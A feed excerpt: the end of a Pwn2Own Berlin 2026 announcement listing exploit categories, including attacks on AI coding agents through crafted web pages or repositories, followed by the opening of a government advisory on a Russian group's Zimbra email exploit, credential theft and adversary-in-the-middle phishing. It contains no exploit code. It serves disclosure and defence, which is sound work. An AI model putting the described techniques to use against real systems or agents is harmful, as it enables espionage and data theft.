<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">Local Escalation of Privilege Category</b></p>




  <p class="">This category is a classic for Pwn2Own and focuses on attacks that originate from a standard user and result in executing code as a high-privileged user. A successful entry in this category must leverage a kernel vulnerability to escalate privileges. Red Hat Enterprise Linux for Workstations returns as our Linux-based target, while Apple macOS, and Microsoft Windows 11 return as targets in this category. Prior exploits in this category have won Pwnie awards, so they’re always interesting to see. Here’s a detailed look at the targets and payouts in this category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/127bc809-2387-4e40-ab0d-2c65175ca167/eop.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/127bc809-2387-4e40-ab0d-2c65175ca167/eop.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/127bc809-2387-4e40-ab0d-2c65175ca167/eop.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/127bc809-2387-4e40-ab0d-2c65175ca167/eop.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/127bc809-2387-4e40-ab0d-2c65175ca167/eop.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/127bc809-2387-4e40-ab0d-2c65175ca167/eop.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/127bc809-2387-4e40-ab0d-2c65175ca167/eop.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/127bc809-2387-4e40-ab0d-2c65175ca167/eop.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/127bc809-2387-4e40-ab0d-2c65175ca167/eop.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="container"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">The Container Category</b></p>




  <p class="">We’re excited to have this category return for its third season, and we’re hopeful that even more contestants will target one of these container targets. For an attempt to be ruled a success against these three, the exploit must be launched from within the guest container/microVM and execute arbitrary code on the host operating system. Again, with help from AWS, Firecracker returns as a target with a prize of $100,000. Here are the targets and payouts for this category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/742779a4-1563-4aa4-bb59-8f189c8eb231/Containers2.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/742779a4-1563-4aa4-bb59-8f189c8eb231/Containers2.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/742779a4-1563-4aa4-bb59-8f189c8eb231/Containers2.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/742779a4-1563-4aa4-bb59-8f189c8eb231/Containers2.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/742779a4-1563-4aa4-bb59-8f189c8eb231/Containers2.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/742779a4-1563-4aa4-bb59-8f189c8eb231/Containers2.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/742779a4-1563-4aa4-bb59-8f189c8eb231/Containers2.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/742779a4-1563-4aa4-bb59-8f189c8eb231/Containers2.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/742779a4-1563-4aa4-bb59-8f189c8eb231/Containers2.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="aidb"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">AI Database Category</b></p>




  <p class="">In the past, AI Hackathons have focused on using AI to develop vulnerabilities or other offensive frameworks. We’re opening up the models and various components themselves for exploitation. The first AI sub-category focuses on databases. An attempt in this category must be launched from the contestant’s laptop. Here’s a look at the targets and awards in the AI Database category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d88dfd8d-1260-41d0-bbb2-389c6550a962/aidb.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d88dfd8d-1260-41d0-bbb2-389c6550a962/aidb.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d88dfd8d-1260-41d0-bbb2-389c6550a962/aidb.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d88dfd8d-1260-41d0-bbb2-389c6550a962/aidb.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d88dfd8d-1260-41d0-bbb2-389c6550a962/aidb.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d88dfd8d-1260-41d0-bbb2-389c6550a962/aidb.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d88dfd8d-1260-41d0-bbb2-389c6550a962/aidb.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d88dfd8d-1260-41d0-bbb2-389c6550a962/aidb.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/d88dfd8d-1260-41d0-bbb2-389c6550a962/aidb.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="aicode"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">The Coding Agent Category</b></p>




  <p class="">Let’s face it. At some point or another, we’ve probably all vibe coded something. There’s no shame in that, but how secure are the tools we use for vibe coding? Well, let’s take the most popular choices and find out. A successful entry must interact with a contestant-controlled resource (e.g. web page, repository, media file) to exploit a vulnerability within the coding agent. The attack vector of the entry must be a common coding agent use case. There are few things out of scope here as well. UI spoofing or misrepresentation unrelated to permission prompts, model jailbreaks or prompt outputs that do not cross security boundaries, and vulnerabilities that require unsafe or permission-less modes are just a few of the things not allowed. As this is a new category, please read the rules carefully to ensure your entry qualifies. Here’s a look at the targets and awards in the AI Coding Agent category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8bb9ea99-c1b3-4567-97cb-db2395131a77/Slide8.jpeg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8bb9ea99-c1b3-4567-97cb-db2395131a77/Slide8.jpeg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8bb9ea99-c1b3-4567-97cb-db2395131a77/Slide8.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8bb9ea99-c1b3-4567-97cb-db2395131a77/Slide8.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8bb9ea99-c1b3-4567-97cb-db2395131a77/Slide8.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8bb9ea99-c1b3-4567-97cb-db2395131a77/Slide8.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8bb9ea99-c1b3-4567-97cb-db2395131a77/Slide8.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8bb9ea99-c1b3-4567-97cb-db2395131a77/Slide8.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/8bb9ea99-c1b3-4567-97cb-db2395131a77/Slide8.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="ailocal"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">The Local Inference Category</b></p>




  <p class="">We couldn’t leave local inference and LLMs out of Pwn2Own. These products claim to provide enhanced data privacy, zero-cost inference, lower latency, and fully offline functionality. We’ll see how the security stacks up. An attempt in this category must be launched from the contestant’s laptop within the contest network. Here are the targets and payouts for the Local Inference category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/33770fe8-49c1-425f-83e5-2b141bd2f4e0/Slide9.jpeg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/33770fe8-49c1-425f-83e5-2b141bd2f4e0/Slide9.jpeg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/33770fe8-49c1-425f-83e5-2b141bd2f4e0/Slide9.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/33770fe8-49c1-425f-83e5-2b141bd2f4e0/Slide9.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/33770fe8-49c1-425f-83e5-2b141bd2f4e0/Slide9.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/33770fe8-49c1-425f-83e5-2b141bd2f4e0/Slide9.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/33770fe8-49c1-425f-83e5-2b141bd2f4e0/Slide9.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/33770fe8-49c1-425f-83e5-2b141bd2f4e0/Slide9.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/33770fe8-49c1-425f-83e5-2b141bd2f4e0/Slide9.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" name="nvidia"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#top"><i data-preserve-html-node="true">Back to top</i></a></p>
<p><b data-preserve-html-node="true">The NVIDIA Category</b></p>




  <p class="">Our last AI sub-category focuses solely on NVIDIA products. For network accessible targets, an attempt must be launched from the contestant's laptop within the contest network. For NV Container Toolkit, the attempt must be launched from within a crafted container image and execute arbitrary code on the host operating system. For Megatron Bridge, entries that leverage vulnerabilities pertaining to pickle deserialization or that leverage a vulnerability when “trust_remote_code=true” are out of scope. Here are the targets and payouts for the NVIDIA category:</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
              
              
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/077616af-de47-4235-a621-a8bf07c8295e/nvidia3.jpg" data-image-dimensions="1024x576" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/077616af-de47-4235-a621-a8bf07c8295e/nvidia3.jpg?format=1000w" width="1024" height="576" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/077616af-de47-4235-a621-a8bf07c8295e/nvidia3.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/077616af-de47-4235-a621-a8bf07c8295e/nvidia3.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/077616af-de47-4235-a621-a8bf07c8295e/nvidia3.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/077616af-de47-4235-a621-a8bf07c8295e/nvidia3.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/077616af-de47-4235-a621-a8bf07c8295e/nvidia3.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/077616af-de47-4235-a621-a8bf07c8295e/nvidia3.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/077616af-de47-4235-a621-a8bf07c8295e/nvidia3.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
            
          
        

        
      
        </figure>
      

    
  


  


<p><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/3/11/announcing-pwn2own-berlin-for-2026#top"><i data-preserve-html-node="true">Back to top</i></a></p>




  <p class=""><strong>Conclusion</strong></p><p class="">The complete rules for Pwn2Own Berlin 2026 are found <a href="https://www.zerodayinitiative.com/Pwn2OwnBerlin2026Rules.html" target="_blank">here</a>. As always, we <strong>highly</strong> encourage entrants to read the rules thoroughly if they choose to participate. If you are thinking about participating but have specific configuration or rule-related questions, <a href="mailto:pwn2own@trendmicro.com?subject=Pwn2Own%20Berlin%202026%20Question" target="_blank">email</a> us. Questions asked over X (nee Twitter), BlueSky, or other means will not be answered. Registration is required to ensure we have sufficient resources on hand at the event. Please contact ZDI at <a href="mailto:pwn2own@trendmicro.com">pwn2own@trendmicro.com</a> to begin the registration process. Registration for onsite participation closes at 5 p.m. Central European Time on May 7, 2026.</p><p class="">Be sure to stay tuned to this blog and follow us on <a href="https://www.twitter.com/thezdi" target="_blank">Twitter</a>, <a href="https://infosec.exchange/@thezdi" target="_blank">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative" target="_blank">LinkedIn</a>, or <a href="https://bsky.app/profile/thezdi.bsky.social" target="_blank">Bluesky</a> for the latest information and updates about the contest. We look forward to seeing everyone in Germany, and we hope to see some of the best in the world show what they can do – vibe coded or not.</p><p class="">With special thanks to our Pwn2Own Berlin 2026 partners AWS, for providing their expertise and technology.</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f5332a6b-e3d2-42e1-bb98-4e9c9de46536/Amazon_Web_Services-Logo.wine.png" data-image-dimensions="3000x2000" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f5332a6b-e3d2-42e1-bb98-4e9c9de46536/Amazon_Web_Services-Logo.wine.png?format=1000w" width="3000" height="2000" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f5332a6b-e3d2-42e1-bb98-4e9c9de46536/Amazon_Web_Services-Logo.wine.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f5332a6b-e3d2-42e1-bb98-4e9c9de46536/Amazon_Web_Services-Logo.wine.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f5332a6b-e3d2-42e1-bb98-4e9c9de46536/Amazon_Web_Services-Logo.wine.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f5332a6b-e3d2-42e1-bb98-4e9c9de46536/Amazon_Web_Services-Logo.wine.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f5332a6b-e3d2-42e1-bb98-4e9c9de46536/Amazon_Web_Services-Logo.wine.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f5332a6b-e3d2-42e1-bb98-4e9c9de46536/Amazon_Web_Services-Logo.wine.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/f5332a6b-e3d2-42e1-bb98-4e9c9de46536/Amazon_Web_Services-Logo.wine.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  





  <p class="">© 2026 Trend Micro Incorporated. All rights reserved. PWN2OWN, ZERO DAY INITIATIVE, ZDI, ZERO DAY INITIATIVE, TrendAI, and Trend Micro are trademarks or registered trademarks of Trend Micro Incorporated. All other trademarks and trade names are the property of their respective owners.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite]]></title>
<description><![CDATA[Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite
Executive summary 
A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboratio...]]></description>
<link>https://tsecurity.de/de/3694430/it-security-nachrichten/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694430/it-security-nachrichten/russian-state-supported-cyber-actors-conduct-phishing-campaign-targeting-users-of-zimbra-collaboration-suite/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="c-page-title__buttons"><a class="c-button" href="https://media.defense.gov/2026/Jul/22/2003965244/-1/-1/1/CSA_RUSSIA_PHISHING_TARGET_ZIMBRA.PDF">Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Users of Zimbra Collaboration Suite</a></div>
<h2><strong>Executive summary</strong> </h2>
<p>A group of Russian state-supported cyber actors has been targeting and compromising various Western government and commercial organizations using the Zimbra Collaboration Suite (ZCS) software since at least July 2025. The Russian state-supported advanced persistent threat (APT) group’s activity is tracked in the cybersecurity community under several names (see <a href="https://www.cisa.gov/#cyber1">Cybersecurity industry tracking</a>), primarily as “LAUNDRY BEAR,” a name initially coined by the Netherlands General Intelligence and Security Service (AIVD) and Defence Intelligence and Security Service (MIVD) [<a href="https://www.cisa.gov/#wc1">1</a>].</p>
<p>LAUNDRY BEAR’s targeting is almost certainly to gather sensitive information for the Russian Federation, with these actors primarily focusing on the covert acquisition of email data. Previous campaigns indicated LAUNDRY BEAR relied on unsophisticated initial access techniques—including password spraying, phishing, and pass-the-cookie—allowing the group to successfully run high-volume operations. The latest campaign targeting ZCS uses a novel exploit that was a zero-day vulnerability when first exploited and continues to be successfully exploited. The vulnerability, Common Vulnerabilities and Exposures (CVE) <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>, was patched in November 2025. This demonstrates LAUNDRY BEAR’s intent and ability to deploy increasingly sophisticated technical capabilities.</p>
<p>Unlike traditional phishing campaigns that persuade a user into taking an action, such as clicking a link or opening a file, LAUNDRY BEAR’s latest campaign leverages a view-based exploit that only requires a user to view a malicious email within a vulnerable version of the webmail service. Once viewed, the exploit attempts to exfiltrate the victim’s last 90 days of email communications, the organization email directory (i.e., Global Address List [GAL]), and other sensitive information to servers controlled by LAUNDRY BEAR. The exploit also attempts to establish persistent access to victim accounts through a variety of means as detailed in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> section.</p>
<p>This Cybersecurity Advisory (CSA) warns of this ongoing malicious threat activity and urges organizations to update their vulnerable software and implement additional mitigations to thwart these Russian state-supported actors’ continued success. The CSA is being released by the following authoring and co-sealing agencies:</p>
<ul>
<li>United States National Security Agency (NSA)</li>
<li>United States Federal Bureau of Investigation (FBI)</li>
<li>Netherlands Defence Intelligence and Security Service (MIVD)</li>
<li>Netherlands General Intelligence and Security Service (AIVD)</li>
<li>United States Cybersecurity and Infrastructure Security Agency (CISA)</li>
<li>United States Defense Counterintelligence and Security Agency (DCSA)</li>
<li>United States Department of Defense Cyber Crime Center (DC3)</li>
<li>United States Department of the Treasury</li>
<li>United States Naval Criminal Investigative Service (NCIS)</li>
<li>Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC)</li>
<li>Communications Security Establishment Canada’s (CSE’s) Canadian Centre for Cyber Security (Cyber Centre)</li>
<li>New Zealand National Cyber Security Centre (NCSC-NZ)</li>
<li>United Kingdom National Cyber Security Centre (NCSC-UK)</li>
<li>Czech Republic National Cyber and Information Security Agency (NÚKIB)<a href="https://www.cisa.gov/#f1"><sup>1</sup></a></li>
<li>Danish Defence Intelligence Service (DDIS)<a href="https://www.cisa.gov/#f2"><sup>2</sup></a></li>
<li>Estonian Foreign Intelligence Service (EFIS)<a href="https://www.cisa.gov/#f3"><sup>3</sup></a></li>
<li>Finnish Defence Intelligence (FDI)<a href="https://www.cisa.gov/#f4"><sup>4</sup></a></li>
<li>Finnish Security and Intelligence Service (SUPO)<a href="https://www.cisa.gov/#f5"><sup>5</sup></a></li>
<li>French General Directorate for Internal Security (DGSI)<a href="https://www.cisa.gov/#f6"><sup>6</sup></a></li>
<li>French National Cybersecurity Agency (ANSSI)<a href="https://www.cisa.gov/#f7"><sup>7</sup></a></li>
<li>Italian External Intelligence and Security Agency (AISE)<a href="https://www.cisa.gov/#f8"><sup>8</sup></a></li>
<li>Italian Internal Intelligence and Security Agency (AISI)<a href="https://www.cisa.gov/#f9"><sup>9</sup></a></li>
<li>Security and Intelligence Service of the Republic of Moldova (SIS RM)<a href="https://www.cisa.gov/#f10"><sup>10</sup></a></li>
<li>Polish Foreign Intelligence Agency (AW)<a href="https://www.cisa.gov/#f11"><sup>11</sup></a></li>
<li>The Military Counterintelligence Service of Poland (SKW)<a href="https://www.cisa.gov/#f12"><sup>12</sup></a></li>
<li>Spain National Intelligence Centre (CNI)<a href="https://www.cisa.gov/#f13"><sup>13</sup></a></li>
<li>Sweden National Cyber Security Centre (NCSC-SE)<a href="https://www.cisa.gov/#f14"><sup>14</sup></a></li>
</ul>
<p>The authoring agencies urge any organizations using ZCS to implement the recommendations listed within the <a href="https://www.cisa.gov/#mitigations1">Mitigations</a> section of this advisory to reduce the risk associated with this activity. This CSA also includes specific remediations for organizations to implement if they discover the presence of the listed <a href="https://www.cisa.gov/#ioc1">Indicators of compromise</a> (IOCs).  </p>
<p>As more organizations update their ZCS software based on this CSA, LAUNDRY BEAR may discontinue the current campaign exploiting this vulnerability; however, based on the success of this and previous campaigns, it is very likely that the group will continue to target ZCS and other email systems used by organizations in Western countries. The actors will almost certainly continue to rely on email to engage potential victims by exploiting novel vulnerabilities and, when necessary, use social engineering techniques to assist with their efforts. The authoring agencies recommend organizations regularly update their mail service software and continuously monitor their email systems and emails for malicious activity.</p>
<p>For a downloadable list of IOCs, see:</p>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.xml">AA26-204A.stix.xml</a> (STIX XML)</li>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.json">AA26-204A.stix.json</a> (STIX JSON)</li>
</ul>
<h2><strong>Cybersecurity industry tracking</strong><a class="ck-anchor"></a></h2>
<p>The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to these Russian state-supported cyber actors. While not exhaustive, the following are threat group names commonly used for these actors within the cybersecurity community:</p>
<ul>
<li>LAUNDRY BEAR</li>
<li>Void Blizzard [<a href="https://www.cisa.gov/#wc2">2</a>]</li>
<li>CL-STA-1114 [<a href="https://www.cisa.gov/#wc3">3</a>]</li>
<li>TA488 (formerly UNK_PitStop) [<a href="https://www.cisa.gov/#wc4">4</a>]</li>
</ul>
<p><strong>Note:</strong> Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.</p>
<h2><strong>Background</strong></h2>
<p>Public advisories from Netherlands General Intelligence and Security Service (AIVD), Netherlands Defence Intelligence and Security Service (MIVD), and Microsoft highlighted these Russian state-supported advanced persistent threat (APT) actors in May 2025, calling them LAUNDRY BEAR and Void Blizzard respectively [<a href="https://www.cisa.gov/#wc1">1</a>] [<a href="https://www.cisa.gov/#wc2">2</a>]. Both advisories assessed that the group was engaged in malicious cyber activity as early as April 2024.  </p>
<p>The May 2025 advisories highlighted a cluster of activity targeting cloud-based email environments, including Microsoft Exchange in particular, and abusing legitimate APIs to perform data exfiltration in bulk [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/002/" target="_blank">T1114.002</a>]. The group relied on unsophisticated means of initial access, including procuring stolen credentials on criminal marketplaces [<a href="https://attack.mitre.org/versions/v19/techniques/T1078/" target="_blank">T1078</a>], and using social engineering techniques to lure targets into interacting with a malicious site masquerading as a legitimate one. As of April 2025, one of these sites resembled a European Defence &amp; Security Summit registration portal that required registrants to sign in to their Microsoft account to view. Once a user entered their Microsoft credentials into this malicious site, LAUNDRY BEAR’s modified version of the open source adversary emulation toolkit, Evilginx, intercepted the user’s credentials. LAUNDRY BEAR then used this authentication data, including passwords and session tokens, to access the compromised account and conduct mass email exfiltration, as well as harvest other information. This method of compromise is commonly known as an adversary-in-the-middle (AiTM) technique [<a href="https://attack.mitre.org/versions/v19/techniques/T1557/" target="_blank">T1557</a>].  </p>
<p>Beginning around July 2025, LAUNDRY BEAR shifted toward a more technical method of email compromise, highlighting their continued efforts to covertly acquire email communications from a variety of Western organizations of interest and deliver them to the Russian Federation. Using a custom-developed capability [<a href="https://attack.mitre.org/versions/v19/techniques/T1587/001/" target="_blank">T1587.001</a>] named “<em>Улей</em>” or “<em>Ulej</em>” (Russian for beehive), LAUNDRY BEAR successfully targeted and exfiltrated sensitive user information from organizations who use the Zimbra Collaboration Suite (ZCS) product [<a href="https://attack.mitre.org/versions/v19/techniques/T1114/" target="_blank">T1114</a>]. Data LAUNDRY BEAR attempted to exfiltrate from compromised accounts included:</p>
<ul>
<li>Last 90 days of emails,</li>
<li>Email address,</li>
<li>Password [<a href="https://attack.mitre.org/versions/v19/techniques/T1589/001/" target="_blank">T1589.001</a>],</li>
<li>Global Address List (GAL) [<a href="https://attack.mitre.org/versions/v19/techniques/T1087/" target="_blank">T1087</a>],</li>
<li>Two-factor authentication (2FA) tokens, and</li>
<li>Newly-created Application Passcode [<a href="https://attack.mitre.org/versions/v19/techniques/T1098/" target="_blank">T1098</a>].</li>
</ul>
